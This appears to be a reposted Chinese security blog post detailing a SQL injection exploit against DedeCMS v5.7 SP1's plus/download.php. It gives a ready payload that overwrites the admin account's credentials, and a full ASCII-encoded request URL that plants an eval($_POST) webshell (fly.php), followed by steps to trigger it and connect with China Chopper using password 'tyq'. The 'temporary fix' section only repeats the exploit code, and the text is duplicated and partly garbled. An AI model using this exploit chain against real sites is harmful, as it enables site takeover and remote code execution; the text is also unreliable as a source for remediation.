Dedecms v5.7 sp1 plus/download.php SQL注入漏洞

破绽详情

原因是全局变量$GLOBALS能够被恣意修正,随意看了下,破绽一堆,我只找了一处。

include/dedesql.class.php

if(isset($GLOBALS['arrs1'])) { $v1 = $v2 = ''; for($i=0;isset($arrs1[$i]);$i++) { $v1 .= chr($arrs1[$i]); } for($i=0;isset($arrs2[$i]);$i++) { $v2 .= chr($arrs2[$i]); //解码ascii } $GLOBALS[$v1] .= $v2; //留意这里不是掩盖,是+ }
function SetQuery($sql) { $prefix="#@__"; $sql = str_replace($prefix,$GLOBALS['cfg_dbprefix'],$sql); //看到这里无话可说,不明白为什么要这样做。 $this->queryString = $sql; }</code>

另外说下绕过80sec防注入的办法。 同一文件中,有两个执行SQL的函数。ExecuteNoneQuery和ExecuteNoneQuery2 而用ExecuteNoneQuery2执行SQL并没有防注入,于是随意找个用ExecuteNoneQuery2执行的文件。

plus/download.php

else if($open==1) { $id = isset($id) && is_numeric($id) ? $id : 0; $link = base64decode(urldecode($link)); $hash = md5($link); //这里的#@是能够控制的 $rs = $dsql->ExecuteNoneQuery2("UPDATE #@__downloads SET downloads = downloads + 1 WHERE hash='$hash' "); if($rs <= 0) { $query = " INSERT INTO #@__downloads(hash,id,downloads) VALUES('$hash','$id',1); "; $dsql->ExecNoneQuery($query); } header("location:$link"); exit(); }</code>

结构SQL语句 (提交的时分用ascii加密,程序会帮我们自动解密的,所以忽视gpc):

adminSETuserid='spider',pwd`='f297a57a5a743894a0e4' where id=1 #</code>

完好SQL语句:

UPDATE dede_admin SET userid='spider', pwd='f297a57a5a743894a0e4' where id=1 #_downloads` SET downloads = downloads + 1 WHERE hash='$hash' </code> 原因是全局变量$GLOBALS能够被恣意修正,随意看了下,破绽一堆,我只找了一处。

include/dedesql.class.php

if(isset($GLOBALS['arrs1']))
{
    $v1 = $v2 = '';
    for($i=0;isset($arrs1[$i]);$i++)
    {
        $v1 .= chr($arrs1[$i]);
    }
    for($i=0;isset($arrs2[$i]);$i++)
    {
        $v2 .= chr($arrs2[$i]);   //解码ascii
    }
    $GLOBALS[$v1] .= $v2; //留意这里不是掩盖,是+
}

function SetQuery($sql)
    {
        $prefix="#@__";
        $sql = str_replace($prefix,$GLOBALS['cfg_dbprefix'],$sql);  //看到这里无话可说,不明白为什么要这样做。
        $this->queryString = $sql;
    }

另外说下绕过80sec防注入的办法。 同一文件中,有两个执行SQL的函数。ExecuteNoneQuery和ExecuteNoneQuery2 而用ExecuteNoneQuery2执行SQL并没有防注入,于是随意找个用ExecuteNoneQuery2执行的文件。

plus/download.php

else if($open==1)
{
    $id = isset($id) && is_numeric($id) ? $id : 0;
    $link = base64_decode(urldecode($link));
    $hash = md5($link);
//这里的#@_是能够控制的
    $rs = $dsql->ExecuteNoneQuery2("UPDATE `#@__downloads` SET downloads = downloads + 1 WHERE hash='$hash' ");
    if($rs <= 0)     {         $query = " INSERT INTO `#@__downloads`(`hash`,`id`,`downloads`) VALUES('$hash','$id',1); ";         $dsql->ExecNoneQuery($query);
    }
    header("location:$link");
    exit();
}

结构SQL语句 (提交的时分用ascii加密,程序会帮我们自动解密的,所以忽视gpc):

admin` SET `userid`='spider', `pwd`='f297a57a5a743894a0e4' where id=1 #

完好SQL语句:

UPDATE `dede_admin` SET `userid`='spider', `pwd`='f297a57a5a743894a0e4' where id=1 #_downloads` SET downloads = downloads + 1 WHERE hash='$hash' 

 


 

getshell

破绽来源: http://0day5.com/archives/591

破绽详情
用的语句是update 很多站 mytag 里面都没内容。那么你用update 那有什么用 修正不了任何数据。只能用 INSERT 当然,语句带#就会暴 错误。。如今要做的饶过即可。以前也出过那么多dede sql 分离饶过,胜利INSERT。 结构语句:

mytag` (aid,expbody,normbody) VALUES(9013,@`'`,'{dede:php}file_put_contents(''fly.php'',''<?php ($_POST[tyq]);?>'');{/dede:php}') # @`'`

1

mytag` (aid,expbody,normbody) VALUES(9013,@`'`,'{dede:php}file_put_contents(''fly.php'',''<?php ($_POST[guige]);?>'');{/dede:php}') # @`'`

应用第一步:

http://localhost/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=101&arrs2[]=120&arrs2[]=112&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=44&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&arrs2[]=76&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=40&arrs2[]=49&arrs2[]=52&arrs2[]=48&arrs2[]=44&arrs2[]=64&arrs2[]=96&arrs2[]=39&arrs2[]=96&arrs2[]=44&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=102&arrs2[]=108&arrs2[]=121&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=116&arrs2[]=121&arrs2[]=113&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=41&arrs2[]=32&arrs2[]=35&arrs2[]=32&arrs2[]=64&arrs2[]=96&arrs2[]=39&arrs2[]=96

应用第二步:

访问http://localhost/plus/mytag_js.php?aid=9013

生成一句话木马.

菜刀衔接 http://localhost/plus/fly.php 密码 tyq
 


暂时处理计划

同一文件中,有两个执行SQL的函数。ExecuteNoneQuery和ExecuteNoneQuery2 而用ExecuteNoneQuery2执行SQL并没有防注入,于是随意找个用ExecuteNoneQuery2执行的文件。

plus/download.php

else if($open==1) { $id = isset($id) && is_numeric($id) ? $id : 0; $link = base64decode(urldecode($link)); $hash = md5($link); //这里的#@是能够控制的 $rs = $dsql->ExecuteNoneQuery2("UPDATE #@__downloads SET downloads = downloads + 1 WHERE hash='$hash' "); if($rs <= 0) { $query = " INSERT INTO #@__downloads(hash,id,downloads) VALUES('$hash','$id',1); "; $dsql->ExecNoneQuery($query); } header("location:$link"); exit(); } 结构SQL语句 (提交的时分用ascii加密,程序会帮我们自动解密的,所以忽视gpc):
adminSETuserid='spider',pwd='f297a57a5a743894a0e4' where id=1 # 完好SQL语句: UPDATE dede_admin SET userid='spider', pwd='f297a57a5a743894a0e4' where id=1 #_downloads SET downloads = downloads + 1 WHERE hash='$hash'
------本页内容已结束,喜欢请分享------

感谢您的来访,获取更多精彩文章请收藏本站。

© 版权声明
THE END
喜欢就支持一下吧
点赞11赞赏 分享
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片